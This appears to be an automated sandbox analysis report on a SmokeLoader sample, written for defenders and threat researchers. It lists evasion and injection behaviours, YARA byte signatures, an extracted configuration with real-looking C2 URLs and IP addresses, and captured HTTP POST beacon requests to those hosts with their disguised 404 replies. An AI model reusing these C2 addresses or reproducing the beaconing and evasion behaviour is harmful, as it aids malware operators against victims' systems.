
Windows Analysis Report
RmbF3635xY.exe

Overview

General Information

Sample name: RmbF3635xY.exe (renamed because original name is a hash value)
Original sample name: f488b4eb65d5f5339401fc0869e614433719e64a5156945b530f98c7d39452e1.exe
Analysis ID: 1525800
MD5: 31059e7394b880f017e83804d9b716ab
SHA1: 2c0057c276d7d2020d1e5a60ca6d44e2fb91674e
SHA256: f488b4eb65d5f5339401fc0869e614433719e64a5156945b530f98c7d39452e1
Tags: bestmagazineforanimalsunicum-ru, exe, user-JAMESWT_MHT

Detection

SmokeLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected SmokeLoader
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Creates a thread in another existing process (thread injection)
Deletes itself after installation
Found API chain indicative of debugger detection
Found evasive API chain (may stop execution after checking system information)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to read the PEB
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sigma detected: Execution of Suspicious File Type Extension
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara signature match

Classification

  • System is w10x64
  • RmbF3635xY.exe (PID: 6828 cmdline: "C:\Users\user\Desktop\RmbF3635xY.exe" MD5: 31059E7394B880F017E83804D9B716AB)
    • explorer.exe (PID: 3504 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
  • jtruajj (PID: 4284 cmdline: C:\Users\user\AppData\Roaming\jtruajj MD5: 31059E7394B880F017E83804D9B716AB)
  • cleanup
Name: SmokeLoader
Description: The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
Attribution: SMOKY SPIDER
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

Malware configuration (extracted): {"Version": 2022, "C2 list": ["http://unicexpertmagazine.pw/index.php", "http://ceoconstractionstore.pl/index.php", "http://openclehardware.ru/index.php", "http://informcoopirationunicolceo.ru/index.php"]}
Source | Rule | Description | Author | Strings
00000004.00000002.1849964354.00000000006B0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security
00000004.00000002.1849964354.00000000006B0000.00000004.00001000.00020000.00000000.sdmp | Windows_Trojan_Smokeloader_4e31426e | unknown | unknown
  • 0x654:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000002.00000002.2713238316.0000000002991000.00000020.80000000.00040000.00000000.sdmp | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security
00000002.00000002.2713238316.0000000002991000.00000020.80000000.00040000.00000000.sdmp | Windows_Trojan_Smokeloader_4e31426e | unknown | unknown
  • 0x254:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000000.00000002.1582993231.00000000005E0000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Smokeloader_3687686f | unknown | unknown
  • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89

System Summary

Source: Process started | Author: Max Altgelt (Nextron Systems) | Data: Command: C:\Users\user\AppData\Roaming\jtruajj, CommandLine: C:\Users\user\AppData\Roaming\jtruajj, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\jtruajj, NewProcessName: C:\Users\user\AppData\Roaming\jtruajj, OriginalFileName: C:\Users\user\AppData\Roaming\jtruajj, ParentCommandLine: , ParentImage: , ParentProcessId: 1124, ProcessCommandLine: C:\Users\user\AppData\Roaming\jtruajj, ProcessId: 4284, ProcessName: jtruajj

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-04T15:10:05.191461+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.9 | 49710 | 193.46.217.78 | 80 | TCP
2024-10-04T15:10:06.535004+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.9 | 49711 | 188.40.141.211 | 80 | TCP
2024-10-04T15:10:06.922982+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.9 | 49711 | 188.40.141.211 | 80 | TCP
2024-10-04T15:10:32.226080+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.9 | 49713 | 193.46.217.78 | 80 | TCP
2024-10-04T15:10:32.432388+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.9 | 49711 | 188.40.141.211 | 80 | TCP
2024-10-04T15:10:32.829421+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.9 | 49711 | 188.40.141.211 | 80 | TCP


AV Detection

Source: RmbF3635xY.exe | Avira: detected
Source: C:\Users\user\AppData\Roaming\jtruajj | Avira: detection malicious, Label: HEUR/AGEN.1312567
Source: 00000004.00000002.1849964354.00000000006B0000.00000004.00001000.00020000.00000000.sdmp | Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://unicexpertmagazine.pw/index.php", "http://ceoconstractionstore.pl/index.php", "http://openclehardware.ru/index.php", "http://informcoopirationunicolceo.ru/index.php"]}
Source: C:\Users\user\AppData\Roaming\jtruajj | ReversingLabs: Detection: 81%
Source: RmbF3635xY.exe | ReversingLabs: Detection: 81%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\jtruajj | Joe Sandbox ML: detected
Source: RmbF3635xY.exe | Joe Sandbox ML: detected
Source: RmbF3635xY.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\RmbF3635xY.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll

Networking

Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.9:49710 -> 193.46.217.78:80
Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.9:49711 -> 188.40.141.211:80
Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.9:49713 -> 193.46.217.78:80
Source: C:\Windows\explorer.exe | Network Connect: 188.40.141.211 80
Source: C:\Windows\explorer.exe | Network Connect: 193.46.217.78 80
Source: Malware configuration extractor | URLs: http://unicexpertmagazine.pw/index.php
Source: Malware configuration extractor | URLs: http://ceoconstractionstore.pl/index.php
Source: Malware configuration extractor | URLs: http://openclehardware.ru/index.php
Source: Malware configuration extractor | URLs: http://informcoopirationunicolceo.ru/index.php
Source: Joe Sandbox View | IP Address: 188.40.141.211 188.40.141.211
Source: Joe Sandbox View | ASN Name: HETZNER-ASDE HETZNER-ASDE
Source: Joe Sandbox View | ASN Name: CUBENODEES CUBENODEES
Source: global traffic | HTTP traffic detected:
    POST /index.php HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://gtatfotvrgw.org/
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Length: 250
    Host: unicexpertmagazine.pw
Source: global traffic | HTTP traffic detected:
    POST /index.php HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://duiiukhvfawcnf.org/
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Length: 173
    Host: ceoconstractionstore.pl
Source: global traffic | HTTP traffic detected:
    POST /index.php HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://trpngknppeg.com/
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Length: 246
    Host: ceoconstractionstore.pl
Source: global traffic | HTTP traffic detected:
    POST /index.php HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://xtihbxaqoab.com/
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Length: 356
    Host: unicexpertmagazine.pw
Source: global traffic | HTTP traffic detected:
    POST /index.php HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://rljealjxpbaxswq.net/
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Length: 363
    Host: ceoconstractionstore.pl
Source: global traffic | HTTP traffic detected:
    POST /index.php HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://qburaxgwiulsnc.com/
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Length: 261
    Host: ceoconstractionstore.pl
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: unicexpertmagazine.pw
Source: global traffic | DNS traffic detected: DNS query: ceoconstractionstore.pl
Source: unknown | HTTP traffic detected:
    POST /index.php HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://gtatfotvrgw.org/
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Length: 250
    Host: unicexpertmagazine.pw
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Server: nginx/1.18.0
    Date: Fri, 04 Oct 2024 13:10:05 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    Data Ascii: 1a2<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at unicexpertmagazine.pw Port 80</address></body></html>0
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Server: nginx/1.18.0
    Content-Length: 7
    Content-Type: application/octet-stream
    Date: Fri, 04 Oct 2024 13:10:06 GMT
    Data Raw: 03 00 00 00 7d 4f d6
    Data Ascii: }O
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Server: nginx/1.18.0
    Content-Length: 0
    Content-Type: application/octet-stream
    Date: Fri, 04 Oct 2024 13:10:06 GMT
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Server: nginx/1.18.0
    Date: Fri, 04 Oct 2024 13:10:32 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    Data Ascii: 1a2<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at unicexpertmagazine.pw Port 80</address></body></html>0
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Server: nginx/1.18.0
    Content-Length: 7
    Content-Type: application/octet-stream
    Date: Fri, 04 Oct 2024 13:10:32 GMT
    Data Raw: 03 00 00 00 7d 4f d6
    Data Ascii: }O
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Server: nginx/1.18.0
    Content-Length: 0
    Content-Type: application/octet-stream
    Date: Fri, 04 Oct 2024 13:10:32 GMT
Source: explorer.exe, 00000002.00000002.2717195196.00000000087BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1573369849.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2717195196.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1573369849.00000000087BB000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 00000002.00000003.2291027999.000000000BEC0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2725388565.0000000010390000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2725441570.0000000010460000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ceoconstractionstore.pl/index.php
Source: explorer.exe, 00000002.00000002.2717195196.00000000087BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1573369849.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2717195196.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1573369849.00000000087BB000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000002.00000002.2717195196.00000000087BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1573369849.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2717195196.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1573369849.00000000087BB000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: explorer.exe, 00000002.00000002.2717195196.00000000087BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1573369849.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2717195196.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1573369849.00000000087BB000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 00000002.00000003.2292625257.000000000BD22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2721431889.000000000BD22000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://qburaxgwiulsnc.com/
Source: explorer.exe, 00000002.00000003.2292625257.000000000BD22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2721431889.000000000BD22000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://qburaxgwiulsnc.com/l
Source: explorer.exe, 00000002.00000000.1573131905.00000000082D0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.2716113298.0000000007670000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1570267826.0000000002C60000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://schemas.micro
Source: explorer.exe, 00000002.00000000.1573255731.00000000085D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2292146114.00000000085E0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000002.00000003.2292625257.000000000BD22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1575532214.000000000BD22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2721431889.000000000BD22000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp(
Source: explorer.exe, 00000002.00000002.2722215051.000000000BE19000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1575532214.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2291599189.000000000BE16000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2291027999.000000000BDE7000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000002.00000002.2722215051.000000000BE19000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1575532214.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2291599189.000000000BE16000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2291027999.000000000BDE7000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://android.notify.windows.com/iOSJM
Source: explorer.exe, 00000002.00000002.2722215051.000000000BE19000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1575532214.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2291599189.000000000BE16000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2291027999.000000000BDE7000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://android.notify.windows.com/iOSZM
Source: explorer.exe, 00000002.00000002.2722215051.000000000BE19000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1575532214.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2291599189.000000000BE16000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2291027999.000000000BDE7000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://android.notify.windows.com/iOSp
Source: explorer.exe, 00000002.00000000.1573369849.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2717195196.0000000008796000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/rT
Source: explorer.exe, 00000002.00000000.1573369849.000000000862F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=A1668CA4549A443399161CE8D2237D12&timeOut=5000&oc
Source: explorer.exe, 00000002.00000000.1573369849.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2717195196.0000000008685000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?z$
Source: explorer.exe, 00000002.00000000.1573369849.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2717195196.0000000008796000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/~T
Source: explorer.exe, 00000002.00000000.1570427978.0000000002F10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2713649615.0000000002F10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000002.00000000.1573369849.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2717195196.0000000008685000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://arc.msn.com
Source: explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg
Source: explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg
Source: explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi
Source: explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKhb
Source: explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKhb-dark
Source: explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPfv
Source: explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPfv-dark
Source: explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPi8
Source: explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPi8-dark
Source: explorer.exe, 00000002.00000000.1575532214.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2722215051.000000000BDEA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2291027999.000000000BDE7000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://excel.office.com
Source: explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA11f7Wa.img
Source: explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1bjET8.img
Source: explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1eBTmz.img
Source: explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hGNsX.img
Source: explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAT0qC2.img
Source: explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AATs0AB.img
Source: explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1e6XdQ.img
Source: explorer.exe, 00000002.00000000.1575532214.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2722215051.000000000BDEA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2291027999.000000000BDE7000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://outlook.com
Source: explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://parade.com/61481/toriavey/where-did-hamburgers-originate
